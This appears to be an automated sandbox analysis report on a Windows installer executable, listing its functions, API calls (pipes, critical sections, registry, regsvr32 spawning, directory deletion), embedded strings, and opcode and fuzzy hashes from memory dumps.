                                                                                    • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                    • API String ID: 1779715363-2312673372
                                                                                    • Opcode ID: 2d446385c45222ae35a04012f96ada37b5c10dc069fd44cb051b942c343805b5
                                                                                    • Instruction ID: 631bd36c21b8289a2ffb424a70e424515061202145823e8d8c015a7ddcff5e77
                                                                                    • Opcode Fuzzy Hash: 2d446385c45222ae35a04012f96ada37b5c10dc069fd44cb051b942c343805b5
                                                                                    • Instruction Fuzzy Hash: 0D418FB0A00708AFDB00EFB5D856FDE7BF9EB48710F11496AF501E7291D7749A408B68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00625DF0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 124pipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,000000FF,00000000,00000000,00000000,00625FD3,?,00000000,0062602E,?,?,00000000,00000000), ref: 00625E4D
                                                                                    • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,00625F68,?,00000000,000000FF,00000000,00000000,00000000,00625FD3), ref: 00625EAA
                                                                                    • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,00000000,?,00000000,00625F68,?,00000000,000000FF,00000000,00000000,00000000,00625FD3), ref: 00625EB7
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 00625F03
                                                                                    • GetOverlappedResult.KERNEL32(?,?,00000000,000000FF,00625F41,00000000,00000000), ref: 00625F2D
                                                                                    • GetLastError.KERNEL32(?,?,00000000,000000FF,00625F41,00000000,00000000), ref: 00625F34
                                                                                      • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                    • String ID: CreateEvent$TransactNamedPipe
                                                                                    • API String ID: 2182916169-3012584893
                                                                                    • Opcode ID: 66b40271833c4ac947b3af9b2247b177b13a9e194abb22b80bd7f88dfb8fc291
                                                                                    • Instruction ID: 45a7b13262c8ba221a264593c31f2682aee6f87904bd064028a6768281c8f284
                                                                                    • Opcode Fuzzy Hash: 66b40271833c4ac947b3af9b2247b177b13a9e194abb22b80bd7f88dfb8fc291
                                                                                    • Instruction Fuzzy Hash: C6418D71A00A08AFDB11DF99DA81EDEBBBAFB08710F1141A9F514E7391D634AA40CF24
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040DF90, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000,00000000), ref: 0040DFAE
                                                                                    • LeaveCriticalSection.KERNEL32(006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFD2
                                                                                    • LeaveCriticalSection.KERNEL32(006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3,?,?,00000000,00000000), ref: 0040DFE1
                                                                                    • IsValidLocale.KERNEL32(00000000,00000002,006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040DFF3
                                                                                    • EnterCriticalSection.KERNEL32(006D0C14,00000000,00000002,006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E050
                                                                                    • LeaveCriticalSection.KERNEL32(006D0C14,006D0C14,00000000,00000002,006D0C14,006D0C14,00000000,0040E094,?,?,?,00000000,?,0040E974,00000000,0040E9D3), ref: 0040E079
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                                    • String ID: en-US,en,
                                                                                    • API String ID: 975949045-3579323720
                                                                                    • Opcode ID: 132b5c44b66357a61607cea8e570c4f98048163ec2b2b075c620ee471578f9dc
                                                                                    • Instruction ID: 4182a3ca1ca8de6b44c3d638db47ef535eef3e1020ae15a43facf6376d410dc7
                                                                                    • Opcode Fuzzy Hash: 132b5c44b66357a61607cea8e570c4f98048163ec2b2b075c620ee471578f9dc
                                                                                    • Instruction Fuzzy Hash: B221C360B506149AEB20B7B78C42B1E3286DB45708F50497FB440BF3C6CAFC8C458AAF
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00624530, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 90COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,0062464A,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00629FF1,00000000,0062A005), ref: 00624556
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062459A
                                                                                      • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                    • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                    • API String ID: 1914119943-2711329623
                                                                                    • Opcode ID: 3799fd6d903a69a31f79a75ffe0ed153fdae39087b1b7be4b8271f0e1526af79
                                                                                    • Instruction ID: 6e8e0d31e8c3c09f4e33b7ba0e6d10679ae3de64b1987244dfe505353b5bcc3b
                                                                                    • Opcode Fuzzy Hash: 3799fd6d903a69a31f79a75ffe0ed153fdae39087b1b7be4b8271f0e1526af79
                                                                                    • Instruction Fuzzy Hash: E9219CB1A40A24AFDB04EBAADC42D6B77EEEF8A7403114469F400E7651EE34EC018F25
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C6D70, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A,?,00000000), ref: 005C6D97
                                                                                      • Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A
                                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C6E6A,?,00000000), ref: 005C6DEA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: 6b6c522d3c770edab7bcb67ac98bb70ea1e086da121dbc8d7ea2477832c323e3
                                                                                    • Instruction ID: 99792ba0868377f284877609c025123efe30c02dabd3e6f2c0b5c4ff46beac99
                                                                                    • Opcode Fuzzy Hash: 6b6c522d3c770edab7bcb67ac98bb70ea1e086da121dbc8d7ea2477832c323e3
                                                                                    • Instruction Fuzzy Hash: BC212C79A00209AEDB10EAF1D856F9F7BF9FB48704F60486EE500E7281EA74AB408755
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006249D4, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
                                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624B84,00000000, /s ",006D479C,regsvr32.exe",?,00624B84), ref: 00624AF2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseDirectoryHandleSystem
                                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                    • API String ID: 2051275411-1862435767
                                                                                    • Opcode ID: 34d3b25b57eaeacb979759aa2842bb8b8fece2e0b53ebe8d3df0fc9dfb4c882e
                                                                                    • Instruction ID: 95f43718ecb6a3265bc8f77fac2cb7b4ee0adae1cc946baa76750ec423c23771
                                                                                    • Opcode Fuzzy Hash: 34d3b25b57eaeacb979759aa2842bb8b8fece2e0b53ebe8d3df0fc9dfb4c882e
                                                                                    • Instruction Fuzzy Hash: DA413134A40718ABDB10EFE5D892BDDBBBAFF48304F50417EA504A7282DB749A05CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                                                    • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileHandleWrite
                                                                                    • String ID: <T@
                                                                                    • API String ID: 3320372497-2050694182
                                                                                    • Opcode ID: 4b1bca956a6cf0ac3a8163dca5164d8526c5294e1121d059f47b6d96abba5736
                                                                                    • Instruction ID: 33e408ca48ad1dbcb2fa22716985c37038247fab0905643a34c658cb983966db
                                                                                    • Opcode Fuzzy Hash: 4b1bca956a6cf0ac3a8163dca5164d8526c5294e1121d059f47b6d96abba5736
                                                                                    • Instruction Fuzzy Hash: A401A9A16086147DE610F3BA9C8AF6B279CCB0976CF10463BB614F61D2C97C9C548B7E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: 8bac78cd018c24294fae1372a9ade90c3476160636c7b0da8341b439c678a567
                                                                                    • Instruction ID: da3bc9e3fd9e780578e72be1a575793d19e87bbd1db11b6bdefce3007bd96747
                                                                                    • Opcode Fuzzy Hash: 8bac78cd018c24294fae1372a9ade90c3476160636c7b0da8341b439c678a567
                                                                                    • Instruction Fuzzy Hash: CA71D131600A408FD715DB29C988B27BBD5EF85314F18C17FE884AB3D2D6B98941CF99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00628C68, Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 121COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00628DEE,?,00000000,?), ref: 00628D30
                                                                                      • Part of subcall function 0060D90C: FindClose.KERNEL32(000000FF,0060DA01), ref: 0060D9F0
                                                                                    Strings
                                                                                    • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00628DA7
                                                                                    • Failed to strip read-only attribute., xrefs: 00628CFE
                                                                                    • Stripped read-only attribute., xrefs: 00628CF2
                                                                                    • Failed to delete directory (%d)., xrefs: 00628DC8
                                                                                    • Failed to delete directory (%d). Will retry later., xrefs: 00628D49
                                                                                    • Deleting directory: %s, xrefs: 00628CB7
                                                                                    • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00628D0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseErrorFindLast
                                                                                    • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                    • API String ID: 754982922-1448842058
                                                                                    • Opcode ID: 28624e6f44032b5ba2e5a621e047490d4a34b5c471f31a3dbc582fc3682b03b5
                                                                                    • Instruction ID: 0d7053e611d435c1968383ac90d2efcc691faa7e680c69a06bbf0affe518b4a0
                                                                                    • Opcode Fuzzy Hash: 28624e6f44032b5ba2e5a621e047490d4a34b5c471f31a3dbc582fc3682b03b5
                                                                                    • Instruction Fuzzy Hash: 3041D630A019288EDB04EB68EC452EEB6F7AF94304F55897EA411E73C1CF748D098F66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCapture.USER32 ref: 005B83B6
                                                                                    • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                                                    • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                                                    • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                    • String ID:
                                                                                    • API String ID: 1994056952-0
                                                                                    • Opcode ID: 222849e93f791e6fe5336b19d95e43f48479be18d58de6e0f9e896b259e8fefc
                                                                                    • Instruction ID: 47a373bf8cf15ed47240c2e20fb0cc0c25a2ef49831a5707915557531a2b0ceb
                                                                                    • Opcode Fuzzy Hash: 222849e93f791e6fe5336b19d95e43f48479be18d58de6e0f9e896b259e8fefc
                                                                                    • Instruction Fuzzy Hash: 0021CEB520460A6FDA60EA99CE80FF777DCFF44748B105829B999C3642EE14FC40C769
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405F80, Relevance: 10.9, APIs: 7, Instructions: 406COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 608735f5bce0e36611a6a74c8b5942bb2db45b7b298456c3db6888c90be37e0c
                                                                                    • Instruction ID: 7dd5b4cb36b4a9a591d6b9d30fe19ff178ae28b977775f2e11cfa4002bd538ad
                                                                                    • Opcode Fuzzy Hash: 608735f5bce0e36611a6a74c8b5942bb2db45b7b298456c3db6888c90be37e0c
                                                                                    • Instruction Fuzzy Hash: 04C123A2710A004BD714AA7D9C8476FB286DBC5324F19823FF645EB3D6DA7CCC558B88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0060D210, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 216COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0060D2F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileStringWrite
